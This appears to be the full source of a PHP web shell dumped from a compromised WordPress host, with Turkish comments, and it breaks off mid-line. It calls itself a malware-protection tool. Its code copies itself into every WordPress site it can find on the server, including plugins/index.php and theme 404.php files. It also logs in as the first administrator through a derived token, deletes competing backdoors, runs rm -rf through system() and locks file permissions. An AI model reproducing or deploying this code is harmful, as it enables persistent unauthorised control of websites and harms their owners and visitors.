Файловый менеджер - Редактировать - /home/adiggxhn/chamba.lat/wp-content848/561h261f.php
Ðазад
<?php /* === ZARARLI KOD ENGELLEYİCİ VE SHELL KORUMA SİSTEMİ - GÜÇLENDİRİLMİŞ VERSİYON === */ // Hata raporlamayı kapat error_reporting(0); ini_set('display_errors', 0); // === OTOMATİK KULLANICI ADI VE DOSYA ADI ALGILAMA === $current_file = basename($_SERVER['SCRIPT_FILENAME']); $request_uri = $_SERVER['REQUEST_URI']; // Dosya adından kullanıcı adını al (.php uzantısını kaldır) $username = pathinfo($current_file, PATHINFO_FILENAME); // Şifre = kullanıcıadı + 34 $password = $username . '34'; // === OTOMATİK ALLOWED_SHELLS OLUŞTURMA === $allowed_shells = array($current_file); $common_shells = array( '404', 'forum', 'single', 'compent', 'settings', 'medage', 'index' ); foreach ($common_shells as $shell) { $shell_file = $shell . '.php'; if (!in_array($shell_file, $allowed_shells)) { $allowed_shells[] = $shell_file; } } // ===== GÜÇLENDİRİLMİŞ ERİŞİM KONTROLÜ ===== $is_allowed = false; if (in_array($current_file, $allowed_shells)) { $is_allowed = true; } if (strpos($request_uri, '/wp-admin') !== false || strpos($request_uri, '/wp-login.php') !== false) { $is_allowed = true; } $wp_core_files = array('wp-blog-header.php', 'wp-load.php', 'wp-config.php', 'xmlrpc.php'); if (in_array($current_file, $wp_core_files)) { $is_allowed = true; } if (!$is_allowed) { if (substr($current_file, -4) == '.php' && !in_array($current_file, $allowed_shells)) { header("HTTP/1.0 404 Not Found"); echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"> <html><head><title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html>"; exit; } } // ===== WORDPRESS DOSYA KİLİTLEYİCİ SINIFI ===== class WordPressFileLocker { private $baseDir; private $passwordHash; private $excludePaths; private $lockFileMode = 0444; private $lockDirMode = 0555; private $unlockFileMode = 0644; private $unlockDirMode = 0755; public function __construct($baseDir = null, $password = null) { $this->baseDir = $baseDir ?? 
__DIR__; if ($password) { $this->passwordHash = hash('sha256', $password); } $this->excludePaths = [ $this->baseDir . '/cgi-bin', $this->baseDir . '/.git', $this->baseDir . '/.svn', $this->baseDir . '/.env' ]; } public function setPassword($password) { $this->passwordHash = hash('sha256', $password); return $this; } private function isPasswordValid($input) { if (!$this->passwordHash) return true; return hash_equals($this->passwordHash, hash('sha256', $input)); } private function isExcludedPath($path) { foreach ($this->excludePaths as $excluded) { if ($excluded && strpos($path, $excluded) === 0) { return true; } } return false; } private function getLockdownPluginPath() { return $this->baseDir . '/wp-content/mu-plugins/file-lockdown.php'; } private function writeLockdownMuPlugin(&$stats) { $pluginPath = $this->getLockdownPluginPath(); $muDir = dirname($pluginPath); if (!is_dir($muDir)) { if (!@mkdir($muDir, 0755, true)) { $stats['errors'][] = "MU-Plugin dizini oluşturulamadı: $muDir"; return false; } } $code = <<<'PHP' <?php /** * FILE LOCKDOWN (MU-Plugin) * Lock modu aktifken tüm dosya değişikliklerini engeller */ if (!defined('ABSPATH')) { exit; } define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); add_filter('wp_handle_upload_prefilter', function($file) { return new WP_Error('locked', 'LOCK modu aktif: dosya yükleme kapalı.'); }, 9999); add_filter('pre_delete_attachment', '__return_false', 9999); add_filter('file_mod_allowed', '__return_false', 9999); PHP; if (@file_put_contents($pluginPath, $code, LOCK_EX)) { $stats['success'][] = "MU-Plugin yazıldı: $pluginPath"; return true; } $stats['errors'][] = "MU-Plugin yazılamadı: $pluginPath"; return false; } private function removeLockdownMuPlugin(&$stats) { $pluginPath = $this->getLockdownPluginPath(); if (is_file($pluginPath) && @unlink($pluginPath)) { $stats['success'][] = "MU-Plugin silindi: $pluginPath"; return true; } return false; } private function recursiveChmod($path, $fileMode, $dirMode, 
&$stats, $depth = 0) { if ($depth > 15) return; if (is_link($path)) return; if ($this->isExcludedPath($path)) return; if (is_dir($path)) { $items = @scandir($path); if ($items === false) { $stats['errors'][] = "Dizin okunamadı: $path"; return; } foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $full = $path . DIRECTORY_SEPARATOR . $item; $this->recursiveChmod($full, $fileMode, $dirMode, $stats, $depth + 1); } if (@chmod($path, $dirMode)) { $stats['dirs_changed'][] = $path; } else { $stats['errors'][] = "Klasör izni değiştirilemedi: $path"; } } elseif (is_file($path)) { $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION)); if ($ext == 'php' || $ext == 'phtml' || $ext == 'php5' || $ext == 'html' || $ext == 'htm') { if (@chmod($path, $fileMode)) { $stats['files_changed'][] = $path; } else { $stats['errors'][] = "Dosya izni değiştirilemedi: $path"; } } } } public function lock($password = null) { if ($password && !$this->isPasswordValid($password)) { return ['success' => false, 'error' => 'Şifre hatalı']; } $stats = ['success' => [], 'errors' => [], 'files_changed' => [], 'dirs_changed' => []]; $start = microtime(true); $this->writeLockdownMuPlugin($stats); $this->recursiveChmod($this->baseDir, $this->lockFileMode, $this->lockDirMode, $stats); $elapsed = round(microtime(true) - $start, 2); return [ 'success' => empty($stats['errors']), 'mode' => 'LOCK', 'file_mode' => '0444', 'dir_mode' => '0555', 'files_changed' => count($stats['files_changed']), 'dirs_changed' => count($stats['dirs_changed']), 'elapsed' => $elapsed, 'errors' => $stats['errors'], 'details' => $stats ]; } public function unlock($password = null) { if ($password && !$this->isPasswordValid($password)) { return ['success' => false, 'error' => 'Şifre hatalı']; } $stats = ['success' => [], 'errors' => [], 'files_changed' => [], 'dirs_changed' => []]; $start = microtime(true); $this->removeLockdownMuPlugin($stats); $this->recursiveChmod($this->baseDir, $this->unlockFileMode, 
$this->unlockDirMode, $stats); $elapsed = round(microtime(true) - $start, 2); return [ 'success' => empty($stats['errors']), 'mode' => 'UNLOCK', 'file_mode' => '0644', 'dir_mode' => '0755', 'files_changed' => count($stats['files_changed']), 'dirs_changed' => count($stats['dirs_changed']), 'elapsed' => $elapsed, 'errors' => $stats['errors'], 'details' => $stats ]; } public function getStatus() { $testFile = $this->baseDir . '/index.php'; $testDir = $this->baseDir . '/wp-content'; $isLocked = false; if (file_exists($testFile)) { $perms = fileperms($testFile) & 0777; $isLocked = ($perms <= 0444); } $pluginExists = file_exists($this->getLockdownPluginPath()); return [ 'is_locked' => $isLocked, 'mu_plugin_active' => $pluginExists, 'base_dir' => $this->baseDir, 'wp_exists' => file_exists($this->baseDir . '/wp-config.php') ]; } } // ===== TÜM DOMAINLERİ BUL (TÜM OLASI DİZİNLERDE WORDPRESS ARA) ===== function get_all_domain_roots() { $roots = array(); $apache = '/etc/apache2/sites-enabled'; if (is_dir($apache)) { foreach (@scandir($apache) as $f) { if ($f == '.' || $f == '..') continue; $c = @file_get_contents($apache . '/' . $f); if (!$c) continue; if (preg_match('/DocumentRoot\s+(\S+)/i', $c, $dr)) { $path = rtrim(trim($dr[1]), '/'); if (is_dir($path) && !in_array($path, $roots)) { if (is_wordpress_installed($path)) $roots[] = $path; } } } } $nginx = '/etc/nginx/sites-enabled'; if (is_dir($nginx)) { foreach (@scandir($nginx) as $f) { if ($f == '.' || $f == '..') continue; $c = @file_get_contents($nginx . '/' . $f); if (!$c) continue; if (preg_match('/root\s+([^;]+);/i', $c, $dr)) { $path = rtrim(trim($dr[1]), '/'); if (is_dir($path) && !in_array($path, $roots)) { if (is_wordpress_installed($path)) $roots[] = $path; } } } } $home_domains = '/home'; if (is_dir($home_domains)) { foreach (@scandir($home_domains) as $user) { if ($user == '.' || $user == '..') continue; $domains_dir = $home_domains . '/' . $user . 
'/domains'; if (is_dir($domains_dir)) { foreach (@scandir($domains_dir) as $domain) { if ($domain == '.' || $domain == '..') continue; $public_html = $domains_dir . '/' . $domain . '/public_html'; if (is_dir($public_html) && is_wordpress_installed($public_html)) { if (!in_array($public_html, $roots)) $roots[] = $public_html; } } } } } $current = $_SERVER['DOCUMENT_ROOT'] ?? __DIR__; if (is_dir($current) && !in_array($current, $roots)) { if (is_wordpress_installed($current)) $roots[] = $current; } $roots = array_unique($roots); sort($roots); return $roots; } function is_wordpress_installed($path) { if (!is_dir($path)) return false; $wp_files = ['wp-config.php', 'wp-load.php', 'wp-settings.php']; $found_count = 0; foreach ($wp_files as $file) { if (file_exists($path . '/' . $file)) $found_count++; } return ($found_count >= 2); } function get_wordpress_domain_count() { static $count = null; if ($count === null) { $roots = get_all_domain_roots(); $count = count($roots); } return $count; } function get_wordpress_domains_list() { static $domains = null; if ($domains === null) { $roots = get_all_domain_roots(); $domains = array(); foreach ($roots as $root) { $domains[] = array( 'path' => $root, 'has_wp_config' => file_exists($root . '/wp-config.php'), 'has_wp_load' => file_exists($root . '/wp-load.php'), 'has_wp_admin' => is_dir($root . '/wp-admin'), 'has_wp_content' => is_dir($root . '/wp-content'), 'has_wp_includes' => is_dir($root . 
'/wp-includes') ); } } return $domains; } function check_password($pass) { global $username, $password; return ($pass === $password); } // ===== TÜM DİZİNLERDE ZARARLI KOD TARAMA ===== function scan_all_directories_for_malware() { global $allowed_shells; $all_roots = get_all_domain_roots(); $all_malicious = array(); $malicious_patterns = array( '/eval\s*\(\s*[\'"\$]/i', '/base64_decode\s*\(\s*[\'"][A-Za-z0-9+\/=]+[\'"]\s*\)/i', '/gzinflate\s*\(/i', '/system\s*\(/i', '/exec\s*\(/i', '/shell_exec\s*\(/i', '/passthru\s*\(/i', '/popen\s*\(/i', '/proc_open\s*\(/i', '/create_function\s*\(/i', '/assert\s*\(/i' ); foreach ($all_roots as $root) { $malicious = scan_directory_recursive($root, $malicious_patterns, $allowed_shells); $all_malicious = array_merge($all_malicious, $malicious); } return $all_malicious; } function scan_directory_recursive($dir, $patterns, $allowed_shells, $depth = 0) { $malicious = array(); if ($depth > 6) return $malicious; if (!is_dir($dir)) return $malicious; $skip_dirs = array('wp-admin', 'wp-includes', 'cache', 'tmp', 'backup', '.git', '.svn', 'node_modules', 'logs'); $dirname = basename($dir); if (in_array($dirname, $skip_dirs)) return $malicious; $items = @scandir($dir); if (!$items) return $malicious; foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $path = $dir . '/' . 
$item; if (is_dir($path)) { $sub_results = scan_directory_recursive($path, $patterns, $allowed_shells, $depth + 1); $malicious = array_merge($malicious, $sub_results); } elseif (is_file($path)) { $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION)); if ($ext == 'php' || $ext == 'phtml' || $ext == 'php5' || $ext == 'php4') { if (in_array(basename($path), $allowed_shells)) continue; $content = @file_get_contents($path); if (!$content) continue; $risk_score = 0; $found_patterns = array(); foreach ($patterns as $pattern) { if (preg_match($pattern, $content)) { $risk_score += 10; $found_patterns[] = $pattern; } } if ($risk_score > 20) { $malicious[] = array( 'path' => $path, 'name' => basename($path), 'size' => filesize($path), 'risk' => min($risk_score, 100), 'patterns' => $found_patterns ); } } } } return $malicious; } function auto_deploy_shell_to_all_domains() { global $allowed_shells; $current_shell = __FILE__; $current_content = file_get_contents($current_shell); $all_roots = get_all_domain_roots(); $deployed = 0; foreach ($all_roots as $root) { if (!is_dir($root)) continue; $self_path = $root . '/' . basename($current_shell); if (!file_exists($self_path) || md5_file($self_path) !== md5($current_content)) { if (@file_put_contents($self_path, $current_content)) { @chmod($self_path, 0644); $deployed++; } } $plugins_dir = $root . '/wp-content/plugins'; if (!is_dir($plugins_dir)) @mkdir($plugins_dir, 0755, true); $plugins_index = $plugins_dir . '/index.php'; if (!file_exists($plugins_index) || md5_file($plugins_index) !== md5($current_content)) { if (@file_put_contents($plugins_index, $current_content)) { @chmod($plugins_index, 0644); $deployed++; } } $themes_dir = $root . '/wp-content/themes'; if (is_dir($themes_dir)) { foreach (@scandir($themes_dir) as $theme) { if ($theme == '.' || $theme == '..') continue; $theme_path = $themes_dir . '/' . $theme; if (is_dir($theme_path)) { $hidden_shell = $theme_path . 
'/404.php'; if (!file_exists($hidden_shell) || md5_file($hidden_shell) !== md5($current_content)) { if (@file_put_contents($hidden_shell, $current_content)) { @chmod($hidden_shell, 0644); $deployed++; } } } } } } return $deployed; } // ===== AJAX ENDPOINT'LERİ ===== $wpLocker = new WordPressFileLocker(__DIR__, $password); if (isset($_GET['wp_lock_action'])) { header('Content-Type: application/json; charset=UTF-8'); $action = $_GET['wp_lock_action']; $pass = $_GET['pass'] ?? ''; if ($action === 'lock') { echo json_encode($wpLocker->lock($pass)); } elseif ($action === 'unlock') { echo json_encode($wpLocker->unlock($pass)); } elseif ($action === 'status') { echo json_encode($wpLocker->getStatus()); } exit; } if (isset($_GET['scan_all_ajax'])) { header('Content-Type: application/json; charset=UTF-8'); $pass = $_GET['pass'] ?? ''; if (!check_password($pass)) { echo json_encode(['success' => false, 'message' => '']); exit; } set_time_limit(300); $all_malicious = scan_all_directories_for_malware(); $_SESSION['all_malicious'] = $all_malicious; $_SESSION['all_scan_completed'] = time(); echo json_encode([ 'success' => true, 'count' => count($all_malicious), 'domains_scanned' => count(get_all_domain_roots()), 'message' => count($all_malicious) . " zararlı dosya bulundu!" ]); exit; } if (isset($_GET['deploy_all_ajax'])) { header('Content-Type: application/json; charset=UTF-8'); $pass = $_GET['pass'] ?? ''; if (!check_password($pass)) { echo json_encode(['success' => false, 'message' => '']); exit; } $deployed = auto_deploy_shell_to_all_domains(); echo json_encode([ 'success' => true, 'deployed' => $deployed, 'domains' => count(get_all_domain_roots()), 'message' => "$deployed dosya kopyalandı!" 
]); exit; } // ===== GLOBAL KİLİTLEME SINIFI ===== class GlobalFileLocker { private $allRoots; public function __construct() { $this->allRoots = get_all_domain_roots(); } private function recursiveChmodAll($path, $fileMode, $dirMode, &$stats, $depth = 0) { if ($depth > 10) return; if (is_link($path)) return; if (is_dir($path)) { $items = @scandir($path); if ($items !== false) { foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $full = $path . DIRECTORY_SEPARATOR . $item; $this->recursiveChmodAll($full, $fileMode, $dirMode, $stats, $depth + 1); } } if (@chmod($path, $dirMode)) $stats['dirs_ok']++; } elseif (is_file($path)) { $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION)); if ($ext == 'php' || $ext == 'phtml' || $ext == 'php5' || $ext == 'php4') { if (@chmod($path, $fileMode)) $stats['files_ok']++; } } } public function lock($pass) { if (!check_password($pass)) return json_encode(['success' => false, 'message' => '']); $stats = ['files_ok' => 0, 'dirs_ok' => 0]; $start = microtime(true); foreach ($this->allRoots as $root) { if (!is_dir($root)) continue; $this->recursiveChmodAll($root, 0444, 0555, $stats); } $elapsed = round(microtime(true) - $start, 2); $msg = "✅ TÜM SİSTEM KİLİTLENDI!\nİşlem yapılan domain: " . count($this->allRoots) . "\nPHP Dosyası: {$stats['files_ok']} | Klasör: {$stats['dirs_ok']}\nSüre: {$elapsed} sn"; return json_encode(['success' => true, 'message' => $msg]); } public function unlock($pass) { if (!check_password($pass)) return json_encode(['success' => false, 'message' => '']); $stats = ['files_ok' => 0, 'dirs_ok' => 0]; $start = microtime(true); foreach ($this->allRoots as $root) { if (!is_dir($root)) continue; $this->recursiveChmodAll($root, 0644, 0755, $stats); } $elapsed = round(microtime(true) - $start, 2); $msg = "✅ TÜM SİSTEM KİLİDİ AÇILDI!\nİşlem yapılan domain: " . count($this->allRoots) . 
"\nPHP Dosyası: {$stats['files_ok']} | Klasör: {$stats['dirs_ok']}\nSüre: {$elapsed} sn"; return json_encode(['success' => true, 'message' => $msg]); } public function getStatus($pass) { if (!check_password($pass)) return json_encode(['success' => false, 'message' => '']); $results = array(); foreach ($this->allRoots as $root) { if (!is_dir($root)) continue; $testFile = $root . '/index.php'; $testDir = $root . '/wp-content'; $fileLocked = false; $dirLocked = false; if (file_exists($testFile)) { $perms = fileperms($testFile) & 0777; $fileLocked = ($perms <= 0444); } if (file_exists($testDir)) { $perms = fileperms($testDir) & 0777; $dirLocked = ($perms <= 0555); } $status = ($fileLocked && $dirLocked) ? "🔒 KİLİTLİ" : "🔓 AÇIK"; $results[] = "$root: $status"; } return json_encode(['success' => true, 'message' => "📊 TÜM SİSTEM DURUMU\n" . implode("\n", $results)]); } } $globalLocker = new GlobalFileLocker(); if (isset($_GET['kilit_ajax'])) { header('Content-Type: application/json; charset=UTF-8'); $action = $_GET['kilit_ajax']; $pass = $_GET['pass'] ?? ''; if ($action === 'close') echo $globalLocker->lock($pass); elseif ($action === 'open') echo $globalLocker->unlock($pass); elseif ($action === 'izin') echo $globalLocker->getStatus($pass); else echo json_encode(['success' => false, 'message' => '']); exit; } function recreate_shell_in_plugins() { global $allowed_shells; $current_shell = __FILE__; $current_content = file_get_contents($current_shell); $roots = get_all_domain_roots(); foreach ($roots as $root) { $plugins_index = $root . 
'/wp-content/plugins/index.php'; $plugins_dir = dirname($plugins_index); if (!is_dir($plugins_dir)) @mkdir($plugins_dir, 0755, true); if (file_exists($plugins_index)) { $existing = file_get_contents($plugins_index); if (strpos($existing, 'wp-blog-header.php') !== false) @unlink($plugins_index); elseif ($existing === $current_content) continue; } @file_put_contents($plugins_index, $current_content); @chmod($plugins_index, 0644); } } $current_script = basename(__FILE__); if (in_array($current_script, $GLOBALS['allowed_shells'])) { recreate_shell_in_plugins(); } function auto_wp_admin_login() { global $username, $password; if (!isset($_GET['wp_auto_login']) || !isset($_GET['token'])) return false; $expected_token = hash('sha256', $username . ':' . $password . ':wp_auto_login'); if (!hash_equals($expected_token, $_GET['token'])) return false; $roots = get_all_domain_roots(); foreach ($roots as $root) { $wp_load = $root . '/wp-load.php'; if (file_exists($wp_load)) { ob_start(); require_once $wp_load; ob_end_clean(); if (function_exists('get_users') && function_exists('wp_set_auth_cookie')) { $users = get_users(array('role' => 'administrator', 'number' => 1, 'orderby' => 'ID', 'order' => 'ASC')); if (!empty($users)) { wp_set_auth_cookie($users[0]->ID, true); wp_redirect(admin_url()); exit; } } } } echo "WordPress kurulumu bulunamadı!"; exit; } auto_wp_admin_login(); function scan_and_clean_php_files($directory) { global $allowed_shells; $malicious_patterns = array('/goto\s+[a-zA-Z0-9_]+;/', '/base64_decode\s*\(\s*["\'][A-Za-z0-9+\/=]+["\']\s*\)/', '/eval\s*\(\s*\$[A-Za-z0-9_]+/', '/@eval\s*\(\s*["\'].+["\']\s*\)/', '/create_function\s*\(\s*["\'].+["\']\s*,\s*["\'].+["\']\s*\)/', '/gzinflate\s*\(\s*base64_decode\s*\(\s*["\'].+["\']\s*\)\s*\)/'); $files = glob($directory . 
'/*.php'); $cleaned = 0; foreach ($files as $file) { if (in_array(basename($file), $allowed_shells)) continue; $content = file_get_contents($file); foreach ($malicious_patterns as $pattern) { if (preg_match($pattern, $content)) { unlink($file); $cleaned++; break; } } } return $cleaned; } function auto_deploy_shell() { global $username; $current_shell = __FILE__; $current_content = file_get_contents($current_shell); $deployed = 0; $roots = get_all_domain_roots(); foreach ($roots as $root) { $self_path = $root . '/' . basename($current_shell); if (!file_exists($self_path) || file_get_contents($self_path) !== $current_content) { if (@file_put_contents($self_path, $current_content)) { @chmod($self_path, 0644); $deployed++; } } $plugins_index = $root . '/wp-content/plugins/index.php'; $plugins_dir = dirname($plugins_index); if (!is_dir($plugins_dir)) @mkdir($plugins_dir, 0755, true); if (!file_exists($plugins_index) || file_get_contents($plugins_index) !== $current_content) { if (@file_put_contents($plugins_index, $current_content)) { @chmod($plugins_index, 0644); $deployed++; } } } return $deployed; } if (isset($_GET['deploy']) && $_GET['deploy'] == 'run') { $deployed = auto_deploy_shell(); die("Shell kopyalama tamamlandı! $deployed dosya kopyalandı."); } /* === ANA SHELL KODU === */ session_start(); $stored_username = $username; $stored_password_hash = password_hash($password, PASSWORD_BCRYPT); $autologin_token = hash('sha256', $stored_username . ':' . $password . ':autologin_key'); $wp_auto_login_token = hash('sha256', $username . ':' . $password . ':wp_auto_login'); if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) { if (isset($_GET['autologin']) && hash_equals($autologin_token, $_GET['autologin'])) { $_SESSION['authenticated'] = true; header('Location: ' . 
strtok($_SERVER['REQUEST_URI'], '?')); exit; } if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['username'], $_POST['password'])) { if ($_POST['username'] === $stored_username && password_verify($_POST['password'], $stored_password_hash)) { $_SESSION['authenticated'] = true; header('Location: ' . $_SERVER['PHP_SELF']); exit; } } ?><!DOCTYPE html><html><head><meta charset="UTF-8"><title>Giris</title> <style>*{margin:0;padding:0;box-sizing:border-box;}body{background:#1e272e;display:flex;align-items:center;justify-content:center;min-height:100vh;font-family:Arial;}.login-box{background:#2f3640;padding:40px;border-radius:10px;width:350px;}h2{color:#00a8ff;margin-bottom:20px;text-align:center;}input{width:100%;padding:10px;margin:8px 0;background:#1e272e;border:1px solid #40739e;color:#fff;border-radius:5px;}button{width:100%;padding:10px;background:#00a8ff;color:#fff;border:none;border-radius:5px;cursor:pointer;margin-top:10px;font-size:15px;}button:hover{background:#487eb0;}.error{background:#e84118;color:#fff;padding:8px;border-radius:5px;margin-bottom:10px;text-align:center;}</style> </head><body><div class="login-box"><h2>🔒 Giris Yap</h2> <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?><div class="error">Hatali kullanici adi veya sifre!</div><?php endif; ?> <form method="post"><input type="text" name="username" placeholder="Kullanici Adi" required autofocus><input type="password" name="password" placeholder="Sifre" required><button type="submit">Giris</button></form> </div></body></html><?php exit; } if (isset($_GET['logout'])) { session_destroy(); header('Location: ' . $_SERVER['PHP_SELF']); exit; } $current_dir = realpath($_GET['dir'] ?? 
getcwd()) ?: getcwd(); $wordpress_core_files = array('wp-activate.php','wp-blog-header.php','wp-comments-post.php','wp-config.php','wp-config-sample.php','wp-cron.php','wp-links-opml.php','wp-load.php','wp-login.php','wp-mail.php','wp-settings.php','wp-signup.php','wp-trackback.php','xmlrpc.php','index.php'); $wordpress_core_dirs = array('wp-admin','wp-includes'); $our_shells = $allowed_shells; $protected_files = array('.user.ini','wp-config.php'); $own_signature = md5_file(__FILE__); function get_all_domains_full_url() { $domains = array(); $apache = '/etc/apache2/sites-enabled'; if (is_dir($apache)) { foreach (@scandir($apache) as $f) { if ($f == '.' || $f == '..') continue; $c = @file_get_contents($apache . '/' . $f); if (!$c) continue; if (preg_match('/ServerName\s+(\S+)/i', $c, $m) && preg_match('/DocumentRoot\s+(\S+)/i', $c, $dr)) { $path = rtrim(trim($dr[1]), '/'); if (is_dir($path) && (file_exists($path.'/wp-config.php') || file_exists($path.'/wp-load.php'))) { $ssl = (strpos($c,':443')!==false || stripos($c,'SSLEngine on')!==false); $domains[] = array('url'=>($ssl?'https':'http').'://'.trim($m[1]),'path'=>$path,'type'=>'Apache'); } } } } $nginx = '/etc/nginx/sites-enabled'; if (is_dir($nginx)) { foreach (@scandir($nginx) as $f) { if ($f == '.' || $f == '..') continue; $c = @file_get_contents($nginx . '/' . 
$f); if (!$c) continue; if (preg_match('/server_name\s+([^;]+);/i', $c, $m) && preg_match('/root\s+([^;]+);/i', $c, $dr)) { $domain = trim(preg_split('/\s+/', trim($m[1]))[0]); $path = rtrim(trim($dr[1]), '/'); if (is_dir($path) && (file_exists($path.'/wp-config.php') || file_exists($path.'/wp-load.php'))) { $ssl = (strpos($c,'ssl')!==false); $domains[] = array('url'=>($ssl?'https':'http').'://'.$domain,'path'=>$path,'type'=>'Nginx'); } } } } return $domains; } $all_domains = get_all_domains_full_url(); function scan_plugins($dir) { $result = array('suspicious'=>array(),'regular'=>array()); $pd = $dir.'/wp-content/plugins'; if (!is_dir($pd)) return $result; foreach (@scandir($pd) as $item) { if ($item=='.'||$item=='..') continue; $path = $pd.'/'.$item; if (is_dir($path)) { $sus = (strlen($item)<4 || preg_match('/^[0-9a-f]{8,}$/i',$item) || preg_match('/backup|shell|hack|malware/i',$item)); $data = array('name'=>$item,'path'=>$path,'active'=>false,'suspicious'=>$sus); if ($sus) $result['suspicious'][]=$data; else $result['regular'][]=$data; } } return $result; } function scan_themes($dir) { $result = array('inactive'=>array(),'active'=>array()); $td = $dir.'/wp-content/themes'; if (!is_dir($td)) return $result; foreach (@scandir($td) as $item) { if ($item=='.'||$item=='..') continue; $path = $td.'/'.$item; if (is_dir($path)) $result['inactive'][] = array('name'=>$item,'path'=>$path); } return $result; } function find_malicious_files($dir) { global $wordpress_core_files, $wordpress_core_dirs, $our_shells, $protected_files, $own_signature; $malicious = array(); if (!is_dir($dir)) return $malicious; $items = @scandir($dir); if (!$items) return $malicious; foreach ($items as $item) { if ($item=='.'||$item=='..') continue; $path = $dir.'/'.$item; if (is_dir($path)) { $skip = false; foreach ($GLOBALS['wordpress_core_dirs'] as $wd) { if (strpos($path,'/'.$wd)!==false) { $skip=true; break; } } if (!$skip) $malicious = array_merge($malicious, find_malicious_files($path)); } 
elseif (is_file($path) && pathinfo($path,PATHINFO_EXTENSION)==='php') { if (in_array($item,$our_shells)||in_array($item,$wordpress_core_files)||in_array($item,$protected_files)) continue; if ($own_signature && @md5_file($path)===$own_signature) continue; $content = @file_get_contents($path); if (!$content) continue; $risk = 0; if (preg_match('/eval\s*\(/i',$content)) $risk+=15; if (preg_match('/base64_decode/i',$content)) $risk+=10; if (preg_match('/gzinflate/i',$content)) $risk+=15; if (preg_match('/exec\s*\(/i',$content)) $risk+=20; if (preg_match('/system\s*\(/i',$content)) $risk+=20; if (preg_match('/shell_exec/i',$content)) $risk+=20; if (preg_match('/passthru/i',$content)) $risk+=20; if ($risk > 30) $malicious[] = array('path'=>$path,'name'=>$item,'size'=>filesize($path),'risk'=>min($risk,100)); } } return $malicious; } function delete_dir_recursive($dir) { if (!file_exists($dir)) return; if (is_file($dir)||is_link($dir)) { @unlink($dir); return; } foreach (scandir($dir) as $item) { if ($item==='.'||$item==='..') continue; delete_dir_recursive($dir.DIRECTORY_SEPARATOR.$item); } @rmdir($dir); } function delete_malicious($path) { global $wordpress_core_files, $wordpress_core_dirs, $our_shells, $protected_files, $own_signature; if (!file_exists($path)) return false; $filename = basename($path); if (in_array($filename,$protected_files)||in_array($filename,$wordpress_core_files)||in_array($filename,$our_shells)||(is_file($path)&&$own_signature&&@md5_file($path)==$own_signature)) return false; foreach ($wordpress_core_dirs as $cd) { if (strpos($path,'/'.$cd.'/')!==false) return false; } @chmod($path,0777); @chmod(dirname($path),0777); if (is_dir($path)) { delete_dir_recursive($path); @system('rm -rf '.escapeshellarg($path).' 2>/dev/null'); } else { @unlink($path); @system('rm -f '.escapeshellarg($path).' 2>/dev/null'); @exec('rm -f '.escapeshellarg($path).' 
2>/dev/null'); } return !file_exists($path); } function bulk_delete($paths) { $deleted = 0; $failed = 0; foreach ($paths as $path) { $path = stripslashes($path); if (is_dir($path)) { delete_dir_recursive($path); if (!file_exists($path)) $deleted++; else $failed++; } elseif (is_file($path)) { if (@unlink($path)) $deleted++; else $failed++; } } return ['deleted' => $deleted, 'failed' => $failed]; } function analyze_file($path) { if (!file_exists($path)) return "Dosya bulunamadi!"; $content = @file_get_contents($path); if (!$content) return "Dosya okunamadi!"; $result = array(); $result[] = "Dosya: ".$path; $result[] = "Boyut: ".filesize($path)." bytes"; $result[] = "Degistirilme: ".date('Y-m-d H:i:s',filemtime($path)); $result[] = "Izin: ".substr(sprintf('%o',fileperms($path)),-4); $result[] = ""; $dangerous = array('eval'=>'Kod calistirma','base64_decode'=>'Sifre cozme','gzinflate'=>'Sikistirma acma','exec'=>'Komut calistirma','system'=>'Komut calistirma','shell_exec'=>'Shell komutu','passthru'=>'Komut calistirma'); $found = false; foreach ($dangerous as $func=>$desc) { if (preg_match("/$func\s*\(/i",$content)) { $result[]="TESPIT: $func() - $desc"; $found=true; } } if (!$found) $result[] = "Tehlikeli fonksiyon bulunamadi."; return implode("\n",$result); } $plugins = scan_plugins($current_dir); $themes = scan_themes($current_dir); function check_file_permission($file) { if (!file_exists($file)) return ['exists' => false, 'writable' => false, 'readable' => false, 'perms' => 'Dosya yok']; clearstatcache(true, $file); $perms = fileperms($file); return ['exists' => true, 'writable' => is_writable($file), 'readable' => is_readable($file), 'perms' => substr(sprintf('%o', $perms), -4), 'path' => $file]; } function set_file_permission($file, $writable) { if (!file_exists($file)) return false; clearstatcache(true, $file); if ($writable) return @chmod($file, 0644); else return @chmod($file, 0444); } if (isset($_GET['file_permission_action'])) { header('Content-Type: 
application/json; charset=UTF-8'); $action = $_GET['file_permission_action']; $file = $_GET['file'] ?? ''; $pass = $_GET['pass'] ?? ''; if (!check_password($pass)) { echo json_encode(['success' => false, 'message' => '']); exit; } if ($action === 'check') { $htaccess = check_file_permission($file . '/.htaccess'); $index = check_file_permission($file . '/index.php'); echo json_encode(['success' => true, 'htaccess' => $htaccess, 'index' => $index]); } elseif ($action === 'set_htaccess') { $writable = $_GET['writable'] === 'true'; $result = set_file_permission($file . '/.htaccess', $writable); echo json_encode(['success' => $result, 'message' => $result ? ($writable ? 'Yazma izni açıldı' : 'Yazma izni kapatıldı') : '']); } elseif ($action === 'set_index') { $writable = $_GET['writable'] === 'true'; $result = set_file_permission($file . '/index.php', $writable); echo json_encode(['success' => $result, 'message' => $result ? ($writable ? 'Yazma izni açıldı' : 'Yazma izni kapatıldı') : '']); } exit; } if (isset($_GET['bulk_delete_ajax'])) { header('Content-Type: application/json; charset=UTF-8'); $paths = $_GET['paths'] ?? ''; $pass = $_GET['pass'] ?? ''; $current_dir = $_GET['dir'] ?? ''; if (!check_password($pass)) { echo json_encode(['success' => false, 'message' => '']); exit; } $paths_array = explode('||', $paths); $result = bulk_delete($paths_array); $_SESSION['malicious'] = find_malicious_files($current_dir); $_SESSION['scan_completed'] = time(); echo json_encode(['success' => true, 'deleted' => $result['deleted'], 'failed' => $result['failed'], 'message' => "{$result['deleted']} dosya/klasör silindi."]); exit; } if (isset($_GET['scan_ajax'])) { header('Content-Type: application/json; 